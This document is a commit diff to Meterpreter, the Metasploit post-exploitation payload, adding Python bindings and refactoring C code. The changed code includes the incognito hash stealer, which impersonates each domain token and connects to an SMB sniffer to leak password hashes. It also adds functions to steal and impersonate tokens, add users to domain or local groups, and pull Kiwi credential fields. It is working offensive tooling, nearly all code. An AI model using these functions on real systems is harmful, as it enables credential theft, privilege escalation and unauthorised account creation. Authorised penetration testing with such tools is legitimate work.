Land #46, add misc python bindings.

c/meterpreter/source/extensions/incognito/hash_stealer.c

@@ -48,26 +48,29 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
 	}
 
 	// Use every token and get hashes by connecting to SMB sniffer
-	for (i=0;i<num_tokens;i++)
-	if (token_list[i].token)
+	for (i = 0; i < num_tokens; i++)
 	{
-		get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
-		// If token is not "useless" local account connect to sniffer
-		if (_stricmp(domain_name, "NT AUTHORITY"))
+		if (token_list[i].token)
 		{
-			// Impersonate token
-			ImpersonateLoggedOnUser(token_list[i].token);
-			
-			// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
-			WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
-			
-			// Connect to smb sniffer
-			if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
+			get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
+			// If token is not "useless" local account connect to sniffer
+			if (_stricmp(domain_name, "NT AUTHORITY"))
+			{
+				// Impersonate token
+				ImpersonateLoggedOnUser(token_list[i].token);
 
-			// Revert to primary token
-			RevertToSelf();
+				// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
+				WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
+
+				// Connect to smb sniffer
+				if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
+				{
+					// Revert to primary token
+					RevertToSelf();
+				}
+			}
+			CloseHandle(token_list[i].token);
 		}
-		CloseHandle(token_list[i].token);
 	}
 
 	packet_transmit_response(ERROR_SUCCESS, remote, response);
@@ -77,7 +80,9 @@ cleanup:
 
 	// Restore token impersonation
 	if (saved_token != INVALID_HANDLE_VALUE)
+	{
 		ImpersonateLoggedOnUser(saved_token);
+	}
 
 	return ERROR_SUCCESS;
 }

c/meterpreter/source/extensions/python/Lib/meterpreter/__init__.py

@@ -1,2 +1,2 @@
-__all__ = ['core', 'elevate']
+__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito']
 

c/meterpreter/source/extensions/python/Lib/meterpreter/core.py

@@ -183,6 +183,13 @@ def packet_get_tlv(pkt, tlv_type):
     return {}
   return tlv
 
+def packet_get_tlv_default(pkt, tlv_type, default):
+  try:
+    tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
+  except IndexError:
+    return {'value': default}
+  return tlv
+
 # END OF COPY PASTE
 
 def validate_bindings(required):

c/meterpreter/source/extensions/python/Lib/meterpreter/elevate.py

@@ -1,11 +1,7 @@
 import meterpreter_bindings
 
 from meterpreter.core import *
-
-TLV_PRIV_EXTENSION = 20000
-
-TLV_TYPE_ELEVATE_TECHNIQUE    = TLV_META_TYPE_UINT   | (TLV_PRIV_EXTENSION + 200)
-TLV_TYPE_ELEVATE_SERVICE_NAME = TLV_META_TYPE_STRING | (TLV_PRIV_EXTENSION + 201)
+from meterpreter.tlv import *
 
 # We only support technique 1 (as it's the only one that doesn't require DLLs)
 def getsystem():
@@ -23,3 +19,21 @@ def rev2self():
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
+
+def steal_token(pid):
+  tlv = tlv_pack(TLV_TYPE_PID, pid)
+  resp = invoke_meterpreter('stdapi_sys_config_steal_token', True, tlv)
+  if resp == None:
+    return False
+
+  print packet_get_tlv(resp, TLV_TYPE_RESULT)['value']
+  return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
+
+def drop_token():
+  resp = invoke_meterpreter('stdapi_sys_config_drop_token', True)
+  if resp == None:
+    return False
+
+  print packet_get_tlv(resp, TLV_TYPE_RESULT)['value']
+  return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
+

c/meterpreter/source/extensions/python/Lib/meterpreter/fs.py

@@ -0,0 +1,24 @@
+import meterpreter_bindings
+
+from meterpreter.core import *
+from meterpreter.tlv import *
+
+def show_mount():
+  resp = invoke_meterpreter('stdapi_fs_mount_show', True)
+  if resp == None:
+      return False
+
+  mounts = []
+  for mount in packet_enum_tlvs(resp, TLV_TYPE_MOUNT):
+    m = mount['value']
+    mounts.append({
+      'Name': packet_get_tlv(m, TLV_TYPE_MOUNT_NAME)['value'],
+      'Type': packet_get_tlv(m, TLV_TYPE_MOUNT_TYPE)['value'],
+      'SpaceTotal': packet_get_tlv_default(m, TLV_TYPE_MOUNT_SPACE_TOTAL, None)['value'],
+      'SpaceFree': packet_get_tlv_default(m, TLV_TYPE_MOUNT_SPACE_FREE, None)['value'],
+      'SpaceUser': packet_get_tlv_default(m, TLV_TYPE_MOUNT_SPACE_USER, None)['value'],
+      'UNC': packet_get_tlv_default(m, TLV_TYPE_MOUNT_UNCPATH, None)['value']
+    })
+
+  return mounts
+

c/meterpreter/source/extensions/python/Lib/meterpreter/incognito.py

@@ -0,0 +1,77 @@
+import meterpreter_bindings
+
+from meterpreter.core import *
+from meterpreter.tlv import *
+
+INCOGNITO_NO_TOKENS = 'No tokens available\n'
+
+def list_user_tokens():
+  return __list_tokens_internal(0)
+
+def list_group_tokens():
+  return __list_tokens_internal(1)
+
+def __list_tokens_internal(order):
+  tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
+  resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
+
+  if resp == None:
+    return None
+
+  if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
+    return None
+
+  delegation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION)['value']
+  impersonation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)['value']
+  return {
+    'Impersonation': impersonation.strip().split('\n') if impersonation != INCOGNITO_NO_TOKENS else [],
+    'Delegation': delegation.strip().split('\n') if delegation != INCOGNITO_NO_TOKENS else []
+  }
+
+def impersonate(user):
+  tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
+  resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
+
+  if resp == None:
+    return False
+
+  return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
+
+def snarf_hashes(server):
+  tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
+  resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
+
+  if resp == None:
+    return False
+
+  return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
+
+def add_user(server, username, password):
+  tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
+  tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
+  tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
+
+  resp = invoke_meterpreter('incognito_add_user', True, tlv)
+
+  if resp == None:
+    return False
+
+  return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
+
+def add_group_user(server, group, username):
+  return __add_group_user_internal('incognito_add_group_user', server, group, username)
+
+def add_localgroup_user(server, group, username):
+  return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
+
+def __add_group_user_internal(msg, server, group, username):
+  tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
+  tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
+  tlv += tlv_pack(TLV_TYPE_INCOGNITO_GROUPNAME, group)
+
+  resp = invoke_meterpreter(msg, True, tlv)
+
+  if resp == None:
+    return False
+
+  return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0

c/meterpreter/source/extensions/python/Lib/meterpreter/kiwi.py

@@ -2,18 +2,7 @@ import meterpreter_bindings
 import meterpreter.user
 
 from meterpreter.core import *
-
-TLV_KIWI_EXTENSION = 20000
-
-TLV_TYPE_KIWI_PWD_ID           = TLV_META_TYPE_UINT    | (TLV_KIWI_EXTENSION + 1)
-TLV_TYPE_KIWI_PWD_RESULT       = TLV_META_TYPE_GROUP   | (TLV_KIWI_EXTENSION + 2)
-TLV_TYPE_KIWI_PWD_USERNAME     = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION + 3)
-TLV_TYPE_KIWI_PWD_DOMAIN       = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION + 4)
-TLV_TYPE_KIWI_PWD_PASSWORD     = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION + 5)
-TLV_TYPE_KIWI_PWD_AUTH_HI      = TLV_META_TYPE_UINT    | (TLV_KIWI_EXTENSION + 6)
-TLV_TYPE_KIWI_PWD_AUTH_LO      = TLV_META_TYPE_UINT    | (TLV_KIWI_EXTENSION + 7)
-TLV_TYPE_KIWI_PWD_LMHASH       = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION + 8)
-TLV_TYPE_KIWI_PWD_NTLMHASH     = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION + 9)
+from meterpreter.tlv import *
 
 def creds_all():
   if not meterpreter.user.is_system():

c/meterpreter/source/extensions/python/Lib/meterpreter/sys.py

@@ -1,15 +1,7 @@
 import meterpreter_bindings
 
 from meterpreter.core import *
-
-TLV_STDAPI_EXTENSION = 0
-
-TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
-TLV_TYPE_OS_NAME               = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1041)
-TLV_TYPE_ARCHITECTURE          = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1043)
-TLV_TYPE_LANG_SYSTEM           = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1044)
-TLV_TYPE_DOMAIN                = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1046)
-TLV_TYPE_LOGGED_ON_USER_COUNT  = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 1047)
+from meterpreter.tlv import *
 
 def info():
   resp = invoke_meterpreter('stdapi_sys_config_sysinfo', True)
@@ -25,3 +17,24 @@ def info():
     'LoggedOn': packet_get_tlv(resp, TLV_TYPE_LOGGED_ON_USER_COUNT)['value']
   }
 
+def ps_list():
+  resp = invoke_meterpreter('stdapi_sys_process_get_processes', True)
+  if resp == None:
+      return False
+
+  processes = []
+  for group in packet_enum_tlvs(resp, TLV_TYPE_PROCESS_GROUP):
+    g = group['value']
+    arch = packet_get_tlv(g, TLV_TYPE_PROCESS_ARCH)
+    processes.append({
+      'Arch': 'x86' if arch == 1 else 'x86_64',
+      'Pid': packet_get_tlv(g, TLV_TYPE_PID)['value'],
+      'PPid': packet_get_tlv(g, TLV_TYPE_PARENT_PID)['value'],
+      'Name': packet_get_tlv(g, TLV_TYPE_PROCESS_NAME)['value'],
+      'Path': packet_get_tlv(g, TLV_TYPE_PROCESS_PATH)['value'],
+      'Session': packet_get_tlv(g, TLV_TYPE_PROCESS_SESSION)['value'],
+      'User': packet_get_tlv(g, TLV_TYPE_USER_NAME)['value']
+    })
+
+  return processes
+

c/meterpreter/source/extensions/python/Lib/meterpreter/tlv.py

@@ -0,0 +1,59 @@
+from meterpreter.core import *
+
+TLV_STDAPI_EXTENSION     = 0
+TLV_INCOGNITO_EXTENSION  = 20000
+TLV_PRIV_EXTENSION       = 20000
+TLV_KIWI_EXTENSION       = 20000
+
+# Stdapi constants
+TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
+TLV_TYPE_OS_NAME               = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1041)
+TLV_TYPE_USER_NAME             = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1042)
+TLV_TYPE_ARCHITECTURE          = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1043)
+TLV_TYPE_LANG_SYSTEM           = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1044)
+TLV_TYPE_SID                   = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1045)
+TLV_TYPE_DOMAIN                = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1046)
+TLV_TYPE_LOGGED_ON_USER_COUNT  = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 1047)
+
+TLV_TYPE_MOUNT                 = TLV_META_TYPE_GROUP  | (TLV_STDAPI_EXTENSION + 1207)
+TLV_TYPE_MOUNT_NAME            = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1208)
+TLV_TYPE_MOUNT_TYPE            = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 1209)
+TLV_TYPE_MOUNT_SPACE_USER      = TLV_META_TYPE_QWORD  | (TLV_STDAPI_EXTENSION + 1210)
+TLV_TYPE_MOUNT_SPACE_TOTAL     = TLV_META_TYPE_QWORD  | (TLV_STDAPI_EXTENSION + 1211)
+TLV_TYPE_MOUNT_SPACE_FREE      = TLV_META_TYPE_QWORD  | (TLV_STDAPI_EXTENSION + 1212)
+TLV_TYPE_MOUNT_UNCPATH         = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1213)
+
+TLV_TYPE_PID                   = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 2300)
+TLV_TYPE_PROCESS_NAME          = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 2301)
+TLV_TYPE_PROCESS_PATH          = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 2302)
+TLV_TYPE_PROCESS_GROUP         = TLV_META_TYPE_GROUP  | (TLV_STDAPI_EXTENSION + 2303)
+TLV_TYPE_PROCESS_ARCH          = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 2306)
+TLV_TYPE_PARENT_PID            = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 2307)
+TLV_TYPE_PROCESS_SESSION       = TLV_META_TYPE_UINT   | (TLV_STDAPI_EXTENSION + 2308)
+
+# Priv constants
+TLV_TYPE_ELEVATE_TECHNIQUE     = TLV_META_TYPE_UINT   | (TLV_PRIV_EXTENSION   + 200)
+TLV_TYPE_ELEVATE_SERVICE_NAME  = TLV_META_TYPE_STRING | (TLV_PRIV_EXTENSION   + 201)
+
+# Kiwi constants
+TLV_TYPE_KIWI_PWD_ID           = TLV_META_TYPE_UINT    | (TLV_KIWI_EXTENSION  + 1)
+TLV_TYPE_KIWI_PWD_RESULT       = TLV_META_TYPE_GROUP   | (TLV_KIWI_EXTENSION  + 2)
+TLV_TYPE_KIWI_PWD_USERNAME     = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION  + 3)
+TLV_TYPE_KIWI_PWD_DOMAIN       = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION  + 4)
+TLV_TYPE_KIWI_PWD_PASSWORD     = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION  + 5)
+TLV_TYPE_KIWI_PWD_AUTH_HI      = TLV_META_TYPE_UINT    | (TLV_KIWI_EXTENSION  + 6)
+TLV_TYPE_KIWI_PWD_AUTH_LO      = TLV_META_TYPE_UINT    | (TLV_KIWI_EXTENSION  + 7)
+TLV_TYPE_KIWI_PWD_LMHASH       = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION  + 8)
+TLV_TYPE_KIWI_PWD_NTLMHASH     = TLV_META_TYPE_STRING  | (TLV_KIWI_EXTENSION  + 9)
+
+# Incognito constants
+TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION      = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 2)
+TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION   = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 3)
+TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER     = TLV_META_TYPE_UINT    | (TLV_INCOGNITO_EXTENSION + 4)
+TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN           = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 5)
+TLV_TYPE_INCOGNITO_GENERIC_RESPONSE            = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 6)
+TLV_TYPE_INCOGNITO_USERNAME                    = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 7)
+TLV_TYPE_INCOGNITO_PASSWORD                    = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 8)
+TLV_TYPE_INCOGNITO_SERVERNAME                  = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 9)
+TLV_TYPE_INCOGNITO_GROUPNAME                   = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 10)
+

c/meterpreter/source/extensions/python/Lib/meterpreter/user.py

@@ -1,11 +1,7 @@
 import meterpreter_bindings
 
 from meterpreter.core import *
-
-TLV_STDAPI_EXTENSION = 0
-
-TLV_TYPE_USER_NAME    = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1042)
-TLV_TYPE_SID          = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1045)
+from meterpreter.tlv import *
 
 SYSTEM_SID = "S-1-5-18"
 

c/meterpreter/source/extensions/stdapi/server/sys/config/config.c

@@ -201,6 +201,7 @@ DWORD populate_uid(Packet* pResponse)
 	{
 		if ((dwResult = get_user_token(tokenUserInfo, sizeof(tokenUserInfo))) != ERROR_SUCCESS)
 		{
+			dprintf("[POPUID] unable to get user token");
 			break;
 		}
 
@@ -383,6 +384,7 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
 
 		if (!dwPid)
 		{
+			dprintf("[STEAL-TOKEN] invalid pid");
 			dwResult = -1;
 			break;
 		}
@@ -417,8 +419,10 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
 			break;
 		}
 
+		dprintf("[STEAL-TOKEN] so far so good, updating thread token");
 		core_update_thread_token(remote, hDupToken);
 
+		dprintf("[STEAL-TOKEN] populating UID");
 		dwResult = populate_uid(response);
 	} while (0);